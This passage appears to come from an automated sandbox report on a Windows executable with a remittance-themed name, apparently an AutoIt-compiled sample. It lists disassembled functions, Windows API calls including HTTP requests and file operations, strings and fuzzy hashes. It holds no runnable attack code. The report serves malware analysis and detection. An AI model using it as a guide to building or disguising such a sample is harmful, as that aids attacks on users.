                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 978794511-0
                                                                      • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                      • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                      • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                      • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                      • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                      • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                      • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                      • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                      • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                      • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$_memcmp
                                                                      • String ID: '$\$h
                                                                      • API String ID: 2205784470-1303700344
                                                                      • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                      • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                      • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                      • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                      • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                      • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                      • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                      • __swprintf.LIBCMT ref: 0045EC33
                                                                      • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                      Strings
                                                                      • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                      • String ID: %4d%02d%02d%02d%02d%02d
                                                                      • API String ID: 2441338619-1568723262
                                                                      • Opcode ID: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
                                                                      • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                      • Opcode Fuzzy Hash: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
                                                                      • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                      APIs
                                                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                      • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Interlocked$DecrementIncrement$Sleep
                                                                      • String ID: @COM_EVENTOBJ
                                                                      • API String ID: 327565842-2228938565
                                                                      • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                      • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                      • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                      • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                      APIs
                                                                      • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                      • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                      • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                      • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                      • VariantClear.OLEAUT32(?), ref: 00470516
                                                                        • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                        • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                      • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                      • String ID: H
                                                                      • API String ID: 3613100350-2852464175
                                                                      • Opcode ID: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
                                                                      • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                      • Opcode Fuzzy Hash: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
                                                                      • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                      APIs
                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                      • DestroyWindow.USER32(?), ref: 00426F50
                                                                      • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                      • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                      • String ID: close all
                                                                      • API String ID: 4174999648-3243417748
                                                                      • Opcode ID: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                                      • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                      • Opcode Fuzzy Hash: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                                      • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                      • String ID:
                                                                      • API String ID: 1291720006-3916222277
                                                                      • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                      • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                      • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                      • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                      • IsMenu.USER32(?), ref: 0045FC5F
                                                                      • CreatePopupMenu.USER32 ref: 0045FC97
                                                                      • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                      • String ID: 0$2
                                                                      • API String ID: 93392585-3793063076
                                                                      • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                      • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                      • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                      • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                      APIs
                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                      • VariantClear.OLEAUT32(?), ref: 00435320
                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                      • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                      • String ID: crts
                                                                      • API String ID: 586820018-3724388283
                                                                      • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                      • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                      • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                      • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                      APIs
                                                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,0040F545,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,004A90E8,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,?,0040F545), ref: 0041013C
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                      • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                      • _wcscat.LIBCMT ref: 0044BCAF
                                                                      • _wcslen.LIBCMT ref: 0044BCBB
                                                                      • _wcslen.LIBCMT ref: 0044BCD1
                                                                      • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                      • String ID: \*.*
                                                                      • API String ID: 2326526234-1173974218
                                                                      • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                      • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                      • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                      • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                      APIs
                                                                        • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                      • _wcslen.LIBCMT ref: 004335F2
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                      • GetLastError.KERNEL32 ref: 0043362B
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                      • _wcsrchr.LIBCMT ref: 00433666
                                                                        • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                      • String ID: \
                                                                      • API String ID: 321622961-2967466578
                                                                      • Opcode ID: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                                      • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                      • Opcode Fuzzy Hash: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                                      • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsnicmp
                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                      • API String ID: 1038674560-2734436370
                                                                      • Opcode ID: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                                      • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                      • Opcode Fuzzy Hash: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                                      • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                      • __lock.LIBCMT ref: 00417981
                                                                        • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                        • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                        • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                      • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                      • __lock.LIBCMT ref: 004179A2
                                                                      • ___addlocaleref.LIBCMT ref: 004179C0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
